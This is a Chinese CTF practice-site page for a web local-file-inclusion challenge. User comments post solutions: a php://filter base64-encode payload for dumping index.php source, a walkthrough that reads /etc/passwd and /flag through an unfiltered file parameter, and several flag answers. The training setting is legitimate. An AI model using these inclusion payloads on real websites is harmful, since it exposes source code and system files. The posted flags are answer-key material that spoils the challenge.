文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12995
提  示:
描  述:
flag{}
评论
tardigrade 2年前

http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

嵌入式学的CTF 3年前

PHP伪协议详解https://blog.csdn.net/cosmoslin/article/details/120695429

回复 0

xiaoxiao972521 3年前

????直接/flag就出来了?

回复 3

iwindy 3年前

没意思,为啥3金币

回复 0

453137 3年前

flag{3f73582017c0a7d0a0d1c937fcb9ccda}

回复 0

gyc3153616052 3年前

flag{d2fc833912015ef20e29905ab607e995}

回复 0

llluyan 3年前

flag:flag{2773e5133de5c764209074ecd6cf2a3a}

回复 0

canxue11 3年前

payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag

回复 1

HuangYanQwQ 3年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 10

snickerX 3年前

php://filter伪协议

回复 1

WriteUp

image
harry

2 金币

评分(11)

解题动态

18171382569 攻破了该题 15小时前
krnxy777 攻破了该题 2天前
Wu. 攻破了该题 3天前
qq1002517 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
Arno_Zoffy 攻破了该题 5天前
Jasmine_Iris 攻破了该题 5天前
AioKT 攻破了该题 5天前
潭影空人心 攻破了该题 6天前
hdcc1 攻破了该题 7天前
linxingjun 攻破了该题 10天前
jaysongong 攻破了该题 10天前
violet1 攻破了该题 11天前
potato66 攻破了该题 11天前
一只小白鲸 攻破了该题 12天前
xiaoxuexue 攻破了该题 13天前
bak3l1 攻破了该题 13天前
妙龄 攻破了该题 13天前
19113115774 攻破了该题 13天前
xyqsin 攻破了该题 14天前
问题反馈